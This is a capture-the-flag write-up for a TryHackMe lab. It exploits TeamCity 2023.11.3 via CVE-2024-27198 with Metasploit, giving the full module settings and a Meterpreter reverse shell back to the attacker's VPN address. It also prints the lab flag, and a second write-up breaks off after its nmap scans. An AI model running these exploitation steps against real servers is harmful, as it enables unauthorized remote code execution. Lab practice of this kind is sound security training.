Try Hack Me Write-ups
Solutions to some Try Hack Me

Try Hack Me/Brains
Write-up / THM / Brains 

 by: alfreddgreat 

 Start the Virtual Machine 

 Run an nmap scan to the VM machine 

 

 

 

 From the nmap scan:  nmap -sS -sC -sV IP_THM_VM_machine 

 Ports 22, 80, and 50000 are open 

 VM machine is an Ubuntu Linux 

 Connect to port 80 using a web browser 

 

 In the result of the nmap, port 50000 is also open and observing the result it is an http server 

 50000/tcp open  ibm-db2? | fingerprint-strings:  |   GetRequest:  |     HTTP/1.1 401  |     TeamCity-Node-Id: MAIN_SERVER |     WWW-Authenticate: Basic realm="TeamCity" |     WWW-Authenticate: Bearer realm="TeamCity" |     Cache-Control: no-store |     Content-Type: text/plain;charset=UTF-8 |     Date: Fri, 18 Oct 2024 01:48:03 GMT |     Connection: close |     Authentication required |     login manually go to "/login.html" page |   drda, ibm-db2, ibm-db2-das:  |     HTTP/1.1 400  |     Content-Type: text/html;charset=utf-8 |     Content-Language: en |     Content-Length: 435 |     Date: Fri, 18 Oct 2024 01:48:03 GMT |     Connection: close |     <!doctype html><html lang="en"><head><title>HTTP Status 400  |     Request</title><style type="text/css">body {font-family:Tahoma,Arial,sans-serif;} h1, h2, h3, b {color:white;background-color:#525D76;} h1 {font-size:22px;} h2 {font-size:16px;} h3 {font-size:14px;} p {font-size:12px;} a {color:black;} .line {height:1px;background-color:#525D76;border:none;}</style></head><body><h1>HTTP Status 400  

 TeamCity-Node-Id: MAIN_SERVER 

 Connect to port 50000 using the web browser 

 

 The webserver has an application of Teamcity Version 2023.11.3 (build 147512) 

 Search the vulnerability of the Teamcity version 2023.11.3 in internet. 

 https://blog.jetbrains.com/teamcity/2024/03/additional-critical-security-issues-affecting-teamcity-on-premises-cve-2024-27198-and-cve-2024-27199-update-to-2023-11-4-now/ 

 

 

 The application Teamcity has a vulnerability of remote code execution (RCE) 

 Check if the Teamcity vulnerability exist in the Metasploit Framework CVE-2024-27198 and CVE-2024-27199 

 Run msfconsole 

 

 Modules 3, 4, 5, 6, 7 and 8 can be used for the CVE-2024-27198  but we don't know if the application in in java, windows, linux or unix. 

 Detect the techniligy being used by the webserver using banner grabbing and we can use WAPPALYZER 

 

 In the wappalyzer you can observe that the Web Servers there is Apache Tomcat which means the application is running in JAVA . 

 Therefore in the msfconsole, we will use module 4 which is target: Java 

 In the msfconsole:   msf6 > use 4 

 

 Then run options to see what is needed in the exploit. The column Required with the yes are obligatory. 

 msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > options 

 

 The fields RHOSTS , RPORT should be filled up. And the LHOST should be the IP that can be reached by the VM Machine. Since the machine is in a VPN, the LHOST will be the VPN IP assigned to the Kali machine. 

 Set the following values 

 msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RHOSTS 10.10.170.24 

 msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set RPORT 50000 

 msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > set LHOST 10.11.80.68 

 Note: 10.10.170.24 is the THM-VM-Machine, 50000 is the Teamcity application port and 10.11.80.68 is the VPN IP of the Kali. 

 

 Now check if the options are set successfully. Run the options command to see the set values. 

 msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > options 

 

 Now we can run the exploit 

 msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > run -j 

 

 If the prompt will not come out, press enter until the following comes out. 

 

 Then we run the sessions to see the session created 

 Meterpreter session 1 opened (10.11.80.68:4444 -> 10.10.170.24:54368) at 2024-10-17 22:38:00 -0400 

 msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > sessions 

 

 There is 1 session created and connected to the target machine (THM-VM-machine). 

 Connect to the session with the command sessions 1 

 msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2024_27198) > sessions 1 

 

 Now we are inside the machine with the meterpreter shell. We can walk through using the meterpreter commands or by running the command shell. 

 meterpreter > shell 

 

 Now we are in the target shell command. To have a prompt run a shell like the following 

 /bin/bash -i 

 

 Now we are inside the VM machine in the directory /opt/teamcity/TeamCity/bin 

 The question to answer in tryhackme.com is the following 

 

 The needed flag is in the /home directory where a user exists. 

 Change directory to /home directory to see who is the user:   ubuntu@brains:/opt/teamcity/TeamCity/bin$  cd /home  and then list the content of the directory with the ls command, 

 

 The user is ubuntu. 

 Change directory to the user directory and get the content of the flag.txt file. 

 ubuntu@brains:/home$ cd ubuntu 

 ubuntu@brains:/home$ ls -l 

 ubuntu@brains:/home$ cat flag.txt 

 

 FLAG: THM{faa9bac345709b6620a6200b484c7594} 

 

 

 Connect to the machine 10.10.70.76 with port 8000 using a browser.

Try Hack Me/Mouse Trap
Try Hack Me / Mouse Trap 

 by: alfreddgreat 

   

 

 root@ip-10-10-63-126:~# nmap -sS -sC -sV 10.10.124.21 

 

 root@ip-10-10-63-126:~# nmap --script vuln 10.10.124.21